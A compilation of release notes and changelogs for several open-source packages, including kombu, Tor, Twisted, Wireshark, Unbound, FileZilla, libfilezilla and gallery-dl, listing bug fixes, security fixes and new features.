Allow redis >= 4.0.2 by @illia-v in #1445
SQS transport: detect FIFO queue properly by checking queue URL by @n0061q in #1450
Ensure that restore is atomic in redis transport by @matusvalo in #1444
test pyaqp v5.0.7 by @auvipy in #1457
try restrict setuptool in CI by @auvipy in #1472
try pining setuptools by @auvipy in #1466
test amqp v5.0.9 by @auvipy in #1462
reduce memory usage of Transport by @pawl in #1470
prevent event loop polling on closed redis transports (and causing leak) by @pawl in #1476
respect connection timeout by @mehdipourfar in #1458
prevent redis event loop stopping on 'consumer: Cannot connect' by @pawl in #1477
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1478
5.2.2
What's Changed
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1430
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1436
pin redis under 4.0.0 for now by @auvipy in #1437
5.2.1
What's Changed
Added integration test of failed authentication to redis by @matusvalo in #1423
Bump redis version to >= 3.4.1 by @matusvalo in #1422
add python 3.10 to classifier by @auvipy in #1424
python !=3.12.1 by @auvipy in #1427
Update librabbitmq.txt by @auvipy in #1426
try latest sqs dependencies by @auvipy in #1428
5.2.0
What's Changed
Revert "Added redis transport key_prefix from envvars" by @matusvalo in #1249
Redis Transport: Small improvements of SentinelChannel by @matusvalo in #1253
Fix pidbox not using default channels on master by @lambacck in #1258
Added self to AUTHORS by @vinayinvicible in #1260
Revert "on worker restart - restore visible regardless to time (#905)" by @vinayinvicible in #1259
Add vine to install dependencies by @chrisburr in #1265
Reformat and improve kombu transport reference docs by @matusvalo in #1264
Pin urllib3<1.26 to fix failing unittests. by @matusvalo in #1273
Add timeout to producer publish by @RezaSi in #1269
Added 4.6.8 changelog by @KFoxder in #1276
Remove python2 compatibility code by @matusvalo in #1277
redis: Support Sentinel with SSL by @auvipy in #1275
Update connections.rst with Redis sentinel example by @anudeepsamaiya in #1285
docs: fix simple typo, propery -> property by @timgates42 in #1286
Support for Azure Service Bus 7.0.0 by @terrycain in #1284
Allow specifying session token by @flying-sheep in #1283
Fix Azure Service Bus URL parsing by @terrycain in #1287
Python 3 style print statement by @rednafi in #1289
min py-amqp to 5.0.5 by @auvipy in #1292
attempt to update to tox docker 2.0 by @auvipy in #1293
http/curl: missing _set_timeout by @raittes in #1296
Stop treating namedtuple as an object when using simplejson by @Hardtack in #1297
SQS back-off policy by @galCohen88 in #1301
SQS retry policy documentation improvement by @galCohen88 in #1304
Port of redis code improvements from prior revision by @matteius in #1132
Revert "Port of redis code improvements from prior revision" by @matusvalo in #1307
Fixed SQS unittests by @matusvalo in #1308
fix: non kombu json message decoding in SQS transport by @moaddib666 in #1306
Add Github Actions CI by @matusvalo in #1309
Update default pickle protocol version to 4 by @illia-v in #1314
Update connection.py by @Krogsager in #1311
Drop support for the lzma backport by @thedrow in #1317
Fix tiny mistake in introduction by @der-gabe in #1312
Drop obsolete code importing pickle by @illia-v in #1315
Small doc fixes by @der-gabe in #1319
Update default login method for librabbitmq and pyamqp by @daviskirk in #936
SQS Broker - handle STS authentication with AWS by @galCohen88 in #1322
min py-amqp to v5.0.6 by @auvipy in #1325
Use a thread-safe implementation of cached_property by @thedrow in #1316
Azure Service Bus - versatile queue names fix by @tsunday in #1324
Fix CI failure by @thedrow in #1327
Add support for SQLAlchemy 1.4 by @thedrow in #1328
Opencollective bot is now configured by @thedrow in #1331
re order CI jobs to make lint the last by @auvipy in #1332
Coerce seconds argument to a floating point number. by @thedrow in #1330
Make flake8 and pydocstyle happy by @matusvalo in #1333
Remove unused appveyor and travis configuration files by @matusvalo in #1335
Ignore kombu.transport.librabbitmq in apicheck. by @matusvalo in #1334
chore: Refactor code quality issues by @akshgpt7 in #1320
Revert "chore: Refactor code quality issues" by @matusvalo in #1342
add accept parameter to SimpleQueue class by @lsaavedr in #1140
prepare_accept_content() now raises SerializerNotInstalled instead of KeyError by @matusvalo in #1343
Remove backward compatible code not used anymore by @matusvalo in #1344
Move pytest.importorskip to run earlier by @felixonmars in #1346
Add support for setting redis username by @gabor-boros in #1351
enable pre-commit by @graingert in #1355
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1359
Add support for Python 3.9 by @D3X in #1363
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1364
Use hostname from URI when server_host is None by @matusvalo in #1366
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1367
Use Python's built-in json module by default, instead of simplejson by @nikolas in #1368
Fixed type comment by @SchizmOne in #1371
SQS Channel.predefined_queues should be {} if not defined by @infinitewarp in #1372
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1374
Add global key prefix for keys set by Redis transporter by @gabor-boros in #1349
fix: raise BrokenPipeError exit on brokenpipe instead of hanging around by @jagguli in #1231
[FAL-2030] fix: add missing commands to prefix by @gabor-boros in #1376
Make BrokerState Transport specific by @matusvalo in #1378
Run integration tests for kombu also with global_keyprefix by @matusvalo in #1380
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1379
v 1.4.x by @auvipy in #1338
stop mentioning librabbitmq by @auvipy in #1381
test new pytest version by @auvipy in #1383
drop python 3.6 from CI by @auvipy in #1382
Fix missing dependency to redis in docs requirements by @matusvalo in #1386
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1387
Remove dependency to case by @matusvalo in #1389
Fix: check redis response type by @kaiix in #1390
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1393
py3.7+ on setup by @auvipy in #1392
Prevent caching of oid in pidbox by @matusvalo in #1394
fix flake8 in kombu/asynchronous/aws/connection.py by @matusvalo in #1397
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1396
Fix test_pidbox unittests to support non-linux platforms by @matusvalo in #1398
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1400
removre bdist by @auvipy in #1406
add python 3.10 to CI & fix other issues by @auvipy in #1402
try to fix CI by @auvipy in #1407
Dont failfast when pypy3 tests fail by @matusvalo in #1408
Return empty list instead of InconsistencyError when exchange table is empty by @matusvalo in #1404
[pre-commit.ci] pre-commit autoupdate by @pre-commit-ci in #1410
5.2.0 release notes by @naomielst in #1417
Changes in version 0.4.6.10 - 2022-02-04
This version contains minor bugfixes but one in particular is that relays
don't advertise onion service v2 support at the protocol version level.
o Minor features (fallbackdir):
- Regenerate fallback directories generated on February 04, 2022.
o Minor features (geoip data):
- Update the geoip files to match the IPFire Location Database, as
retrieved on 2022/02/04.
o Minor bugfix (logging):
- Update a log notice dead URL to a working one. Fixes bug 40544;
bugfix on 0.3.5.1-alpha.
o Minor bugfix (relay):
- Remove the HSDir and HSIntro onion service v2 protocol versions so
relay stop advertising that they support them. Fixes bug 40509;
bugfix on 0.3.5.17.
o Minor bugfixes (MetricsPort, Prometheus):
- Add double quotes to the label values of the onion service
metrics. Fixes bug 40552; bugfix on 0.4.5.1-alpha.
Twisted 22.1.0 (2022-02-03)
===========================
Features
--------
- Python 3.10 is now a supported platform
- Type annotations have been added to the twisted.python.fakepwd module.
Bugfixes
--------
- twisted.internet.defer.inlineCallbacks has an improved type annotation, to avoid typing errors when it is used on a function which returns a non-None result.
- ``twisted.internet.base.DelayedCall.__repr__`` and ``twisted.internet.task.LoopingCall.__repr__`` had the changes from 10155 reverted to accept non-function callables.
- Revert the removal of .whl building that was done as part of 10177.
- The type annotation of the host parameter to twisted.internet.interfaces.IReactorTCP.connectTCP has been corrected from bytes to str.
- Deprecated ``twisted.python.threading.ThreadPool.currentThread()`` in favor of ``threading.current_thread()``.
Switched ``twisted.python.threading.ThreadPool.currentThread()`` and ``twisted.python.threadable.getThreadID()`` to use `threading.current_thread()`` to avoid the deprecation warnings introduced for ``threading.currentThread()`` in Python 3.10.
Improved Documentation
----------------------
- twisted.internet.utils.runWithWarningsSupressed behavior of waiting on deferreds has been documented.
- Sync API docs templates with pydoctor 21.9.0 release, using new theming capabilities.
Bugfixes
--------
- SSHTransportBase.ssh_KEXINIT now uses the remote peer preferred MAC list for negotiation. In previous versions it was only using the local preferred MAC list.
Features
~~~~~~~~
- twisted.conch.ssh now supports SSH extension negotiation (RFC 8308).
Bugfixes
~~~~~~~~
- twisted.conch now uses constant-time comparisons for MACs.
- twisted.conch.ssh.filetransfer.FileTransferServer will now return an ENOENT error status if an SFTP client tries to close an unrecognized file handle.
- twisted.web.client.RedirectAgent and twisted.web.client.BrowserLikeRedirectAgent now properly remove sensitive headers when redirecting to a different origin.
Improved Documentation
----------------------
- Add type annotations for twisted.web.client.readBody.
Deprecations and Removals
~~~~~~~~~~~~~~~~~~~~~~~~~
- twisted.web.client.getPage, twisted.web.client.downladPage, and the associated implementation classes (HTTPPageGetter, HTTPPageDownloader, HTTPClientFactory, HTTPDownloader) have been removed because they do not segregate cookies by domain. They were deprecated in Twisted 16.7.0 in favor of twisted.web.client.Agent. GHSA-92x2-jw7w-xvvx.
Mail
----
No significant changes.
Words
-----
No significant changes.
Names
-----
No significant changes.
Trial
-----
Bugfixes
~~~~~~~~
- trial.runner.filenameToModule now sets the correct module.__name__ and sys.modules key
Twisted is a framework, written in Python, for writing networked applications.
It includes implementations of a number of commonly used network services such
as a web server, an IRC chat server, a mail server, a relational database
interface and an object broker. Developers can build applications using all of
these services as well as custom services that they write themselves. Twisted
also includes a user authentication system that controls access to services
and provides services with user context information to implement their own
security models.
Note that while this package provides most of Twisted, Twisted Conch
(SSH client/server) only functions if security/py-amkCrypto is also
installed.
This package contains the last version supporting Python 2.
5.0.18.3, released 2021-12-24
Compatibility with aeson-2.0
5.0.18.2, released 2021-09-01
Compatibility with extra-1.7.10
#370, add --jsonl to produce JSON on separate lines
Version 3.1.2.7
* No change from 3.1.2.6 but to take a right procedure to upload "network"
to Hackage for Windows.
Version 3.1.2.6
* Making IPv4PktInfo on Win the same as that on Posix #522
* Add support for nix/ghcjs #517
Version 3.1.2.5
* Regenerate configure script with autoconf-2.69 to temporarily fix broken
cabal-3.4.0.0 on Windows. Note that the old one was generated with
autoconf-2.71. #513
Version 3.1.2.3
* Supporting M1 Mac #510
* Workaround for autoconf on Windows #508
* Fixing building failure on SmartOS #507
* HsNet.h: remove unused fn hsnet_inet_ntoa definition #504
* Use a working define for OpenBSD detection #503
Version 3.1.2.2
* Allow bytestring 0.11 #490
* Export StructLinger #491
* Fix a couple of broken tests on OpenBSD #498
Wireshark 3.6.2 Release Notes
What’s New
Bug Fixes
The following vulnerabilities have been fixed:
• wnpa-sec-2022-01[1] RTMPT dissector infinite loop. Issue
17813[2].
• wnpa-sec-2022-02[3] Large loops in multiple dissectors. Issue
17829[4], Issue 17842[5], Issue 17847[6], Issue 17855[7], Issue
17891[8], Issue 17925[9], Issue 17926[10], Issue 17931[11], Issue
17932[12], Issue 17933[13].
• wnpa-sec-2022-03[14] PVFS dissector crash. Issue 17840[15].
• wnpa-sec-2022-04[16] CSN.1 dissector crash. Issue 17882[17].
• wnpa-sec-2022-05[18] CMS dissector crash. Issue 17935[19].
The following bugs have been fixed:
• Support for GSM SMS TPDU in HTTP2 body Issue 17784[20].
• Wireshark 3.6.1 broke the ABI by removing ws_log_default_writer
from libwsutil Issue 17822[21].
• Fedora RPM package build failing with RPATH of /usr/local/lib64
Issue 17830[22].
• macos-setup.sh: ftp.pcre.org no longer exists Issue 17834[23].
• nmap.org/npcap → npcap.com: domain/URL change Issue 17838[24].
• MPLS ECHO FEC stack change TLV not dissected correctly Issue
17868[25].
• Attempting to open a systemd journal export file segfaults Issue
17875[26].
• Dissector bug on 802.11ac packets Issue 17878[27].
• The Info column shows only one NGAP/S1AP packet of several
packets inside an SCTP packet Issue 17886[28].
• Uninstalling Wireshark 3.6.1 on Windows 10 fails to remove the
installation directory because it doesn’t remove the User’s Guide
subdirectory and all its contents. Issue 17898[29].
• 3.6 doesn’t build without zlib Issue 17899[30].
• SIP Statistics no longer properly reporting method type
accounting Issue 17904[31].
• Fuzz job crash output: fuzz-2022-01-26-6940.pcap Issue 17909[32].
• SCTP retransmission detection broken for the first data chunk of
each association with relative TSN Issue 17917[33].
• “Show In Folder” doesn’t work correctly for filenames with spaces
Issue 17927[34].
New and Updated Features
New Protocol Support
There are no new protocols in this release.
Updated Protocol Support
AMP, ASN.1 PER, ATN-ULCS, BGP, BP, CFLOW, CMS, CSN.1, GDSDB, GSM RP,
GTP, HTTP3, IEEE 802.11 Radiotap, IPDC, ISAKMP, Kafka, MP2T, MPEG
PES, MPEG SECT, MPLS ECHO, NGAP, NTLMSSP, OpenFlow 1.4, OpenFlow 1.5,
P_MUL, PN-RT, PROXY, PTP, PVFS, RSL, RTMPT, rtnetlink, S1AP, SCTP,
Signal PDU, SIP, TDS, USB, WAP, and ZigBee ZCL
New and Updated Capture File Support
BLF and libpcap
New File Format Decoding Support
There is no new or updated file format support in this release.
v1.17.0
This is a long overdue release!
Added:
Update records
Delete records
Support for Projects in Manager
Loadbalancer missing properties
Changed:
Updated Loadbalancer docs
* [youtube:search] Fix extractor by
[coletdjnz](https://github.com/coletdjnz)
* [youtube:search] Add tests
* [twitcasting] Enforce UTF-8 for POST payload by
[Lesmiscore](https://github.com/Lesmiscore)
* [mediaset] Fix extractor by
[nixxo](https://github.com/nixxo)
* [websocket] Make syntax error in `websockets` module non-fatal
Pkgsrc changes:
* none, other than checksums.
Upstream changes:
This release has bug fixes for crashes that happened on heavy network
usage. The default for the aggressive-nsec option has changed, it is now
enabled.
The ratelimit logic had to be reworked for the crash fixes. As a result,
there are new options to control the behaviour of ratelimiting.
The ratelimit-backoff and ip-ratelimit-backoff options can be used to
control how severe the backoff is when the ratelimit is exceeded.
The rpz-signal-nxdomain-ra option can be used to unset the RA flag, for
NXDOMAIN answers from RPZ. That is used by some clients to detect that
the domain is externally blocked. The RPZ option for-downstream can be
used like for auth zones, this allows the RPZ zone information to be
queried. That can be useful for monitoring scripts.
Features
- Fix#596: unset the RA bit when a query is blocked by an unbound
RPZ nxdomain reply. The option rpz-signal-nxdomain-ra allows to
signal that a domain is externally blocked to clients when it
is blocked with NXDOMAIN by unsetting RA.
- Add rpz: for-downstream: yesno option, where the RPZ zone is
authoritatively answered for, so the RPZ zone contents can be
checked with DNS queries directed at the RPZ zone.
- Merge PR #616: Update ratelimit logic. It also introduces
ratelimit-backoff and ip-ratelimit-backoff configuration options.
- Change aggressive-nsec default to yes.
Bug Fixes
- Fix compile warning for if_nametoindex on windows 64bit.
- Merge PR #581 from fobser: Fix -Wmissing-prototypes and -Wshadow
warnings in rpz.
- Fix validator debug output about DS support, print correct algorithm.
- Add code similar to fix for ldns for tab between strings, for
consistency, the test case was not broken.
- Allow local-data for classes other than IN to inherit a configured
local-zone's type if possible, instead of defaulting to type
transparent as per the implicit rule.
- Fix to pick up other class local zone information before unlock.
- Add missing configure flags for optional features in the
documentation.
- Fix Unbound capitalization in the documentation.
- Fix#591: Unbound-anchor manpage links to non-existent license file.
- contrib/aaaa-filter-iterator.patch file renewed diff content to
apply cleanly to the current coderepo for the current code version.
- Fix to add test for rpz-signal-nxdomain-ra.
- Fix#596: only unset RA when NXDOMAIN is signalled.
- Fix that RPZ does not set RD flag on replies, it should be copied
from the query.
- Fix for #596: fix that rpz return message is returned and not just
the rcode from the iterator return path. This fixes signal unset RA
after a CNAME.
- Fix unit tests for rpz now that the AA flag returns successfully from
the iterator loop.
- Fix for #596: add unit test for nsdname trigger and signal unset RA.
- Fix for #596: add unit test for nsip trigger and signal unset RA.
- Fix#598: Fix unbound-checkconf fatal error: module conf
'respip dns64 validator iterator' is not known to work.
- Fix for #596: Fix rpz-signal-nxdomain-ra to work for clientip
triggered operation.
- Merge #600 from pemensik: Change file mode before changing file
owner.
- Fix prematurely terminated TCP queries when a reply has the same ID.
- For #602: Allow the module-config "subnetcache validator cachedb
iterator".
- Fix EDNS to upstream where the same option could be attached
more than once.
- Add a region to serviced_query for allocations.
- For dnstap, do not wakeupnow right there. Instead zero the timer to
force the wakeup callback asap.
- Fix#610: Undefine-shift in sldns_str2wire_hip_buf.
- Fix#588: Unbound 1.13.2 crashes due to p->pc is NULL in
serviced_udp_callback.
- Merge PR #612: TCP race condition.
- Test for NSID in SERVFAIL response due to DNSSEC bogus.
- Fix#599: [FR] RFC 9156 (obsoletes RFC 7816), by noting the new RFC
document.
- Fix tls-* and ssl-* documented alternate syntax to also be available
through remote-control and unbound-checkconf.
- Better cleanup on failed DoT/DoH listening socket creation.
- iana portlist update.
- Fix review comment for use-after-free when failing to send UDP out.
- Merge PR #603 from fobser: Use OpenSSL 1.1 API to access DSA and RSA
internals.
- Merge PR #532 from Shchelk: Fix: buffer overflow bug.
- Merge PR #617: Update stub/forward-host notation to accept port and
tls-auth-name.
- Update stream_ssl.tdir test to also use the new forward-host
notation.
- Fix header comment for doxygen for authextstrtoaddr.
- please clang analyzer for loop in test code.
- Fix docker splint test to use more portable uname.
- Update contrib/aaaa-filter-iterator.patch with diff for current
software version.
- Fix for #611: Integer overflow in sldns_wire2str_pkt_scan.
3.57.0 (2021-12-10)
- Fixed incorrect default settings for file editing
- Fixed a crash looking up data in file lists
- Fixed a crash if a HTTPS connection gets canceled during the TLS handshake
- Updated to libfilezilla 0.35.0
3.56.2 (2021-10-27)
- Fixed a potential crash after uploading
3.56.1 (2021-10-26)
- macOS Monterey: Opening the Site Manager on startup is now delayed a millisecond, otherwise the right mouse button would have stopped working
- macOS: Fixed getting temporary directory
- MSW: Updated to libfilezilla 0.34.1 to fix local directory contents returned by the system in oversized buffers containing nulls
3.56.0 (2021-10-11)
- Updated to libfilezilla 0.34.0
- Updated translations
3.56.0-rc1 (2021-09-29)
+ Right-clicking a queue tab header now opens the same context menu as right-clicking the correponding queue contents
+ By default, the minimum allowed TLS version is now TLS 1.2
+ Optionally, the systen trust store can be used for certificate verification
- FTP: Fixed an issue with key file conversion
- Fixed an issue loading servers not supporting session resumption from storage
0.36.0 (2022-02-02)
+ Added parameter to tls_layer::set_alpn to control which peer has priority over which ALPN is chosen.
+ Added fz::hmac_sha1
+ Mutex debugging framework to detect locking order inversions that may lead to deadlocks
+ Add additional io_redirect mode to fz::process_spawn where the parent-side handles for stdin/out/err are always closed
- fz::json: Handle object members with empty string as name
- Minor performance improvements to removing timers and to spawning processes
0.35.0 (2021-12-08)
+ *nix: Added fz::forkblock which can be used to safely set FD_CLOEXEC on descriptors even if the system lacks SOCK_CLOCKEXEC, MSG_CMSG_CLOEXEC, pipe2 or accept4
+ macOS: Impersonation support
+ Added fz::tls_layer::set_unexpected_eof_cb, in some situations it may be desirable that unexpected closure is not reported as a hard errror
- Added various convenience overloads for fz::buffer
- Performance improvement for fz::json::to_string
0.34.2 (2021-10-26)
+ fz::file::open now returns fz::result
- fz::tls_layer: Additional fixes for trust path extration
- MSW: fz::local_filesys::get_next_file now handles directory contents returned by the kernel in oversized buffers with embedded nulls
0.34.1 (2021-10-19)
- *nix: Handle supplementary groups when impersonating
- *nix: fz::recv_fd now sets the MSG_CMSG_CLOEXEC flag
- *nix: fz::local_filesys::get_link_target now handles link targets larger than 1024 bytes
- MSW: Restrict DLL search path for system DLLs to the system32 directory
- fz::tls_layer: Fixed how trust path extration interacts with CRLs
0.34.0 (2021-10-11)
- MSW: Load shell32.dll and ole32.dll on-demand at runtime, it is not available in all environments
- Made fz::local_filesys movable
0.33.0 (2021-09-29)
+ MSW: Add local_filesys::begin_find_files overload accepting a directory HANDLE
+ If peer certificate chain is trusted by the system trust store, tls_session_info::get_certificates now returns the actual path to the trust anchor, use tls_session_info::get_peer_certificates to get the peer certificates as received by the server. GnuTLS 3.7.0 or later is required.
- JSON: Correctly handle \u-encoded UTF-16 surrogate pairs
0.32.0 (2021-09-14)
+ MSW: Impersonation support
- Allow more direct control over session ticket/PSK generation under TLS 1.3, requires GnuTLS 3.6.14 or later
- Ensure an error is returned if accepting a socket fails
- Fixed appending to fz::buffer
0.32.0-beta1 (2021-08-30)
+ *nix: Impersonation support
+ *nix: Sending of file descriptors over Unix Domain Sockets
* nix: Add local_filesys::begin_find_files overload accepting a directory file descriptor
+ Allow creating fz::file from a file descriptors/handle, add function to detach the descriptor/handle
+ Added fz::datetime::operator>=
+ Added fz::duration::absolute()
- fz::sprintf no longer crashes on x and X conversion specifiers if a negative signed integer is passed as argument
- Replace std::random_device as the C++ standard allows it to not be random
- JSON: Fixed crash if assigning values from nested values
- JWS: Fixed memory leak and padding of signature components
Changes:
## 1.20.3
- Fixes to kemonoparty and twitter extractors.
## 1.20.2
- Add event extractor for twitter
- Add `--source-address` command-line option #2206
- Enable cards option on twitter extractor by default
- Several fixes
## 1.20.1
- Add newgrounds search extractor
- Restore `-d/--dest` functionality from before 1.20.0
- Change short option for `--directory` to `-D`
- Several fixes
## 1.20.0
- Improve several extractors
- Add a generic extractor
- Add `-d/--directory` and `-f/--filename` command-line options
- Add `--sleep-request` and `--sleep-extractor` command-line options
- Prefer yt-dlp over youtube-dl
- Rename `--write-infojson` to `--write-info-json`
- Several fixes
## 1.19.3
- Improve several extractors
- Several fixes
- Remove seisoparty
## 1.19.2
- Improve several extractors
- Several fixes
## 1.19.1 - 2021-10-24
- Improve several extractors
- Several fixes
## 1.19.0 - 2021-10-01
- Improve several extractors
- Implement a download progress indicator
- Implement a `page-reverse` option
- Implement a way to specify extended format strings
- Add a `--write-infojson` command-line option
- Several fixes
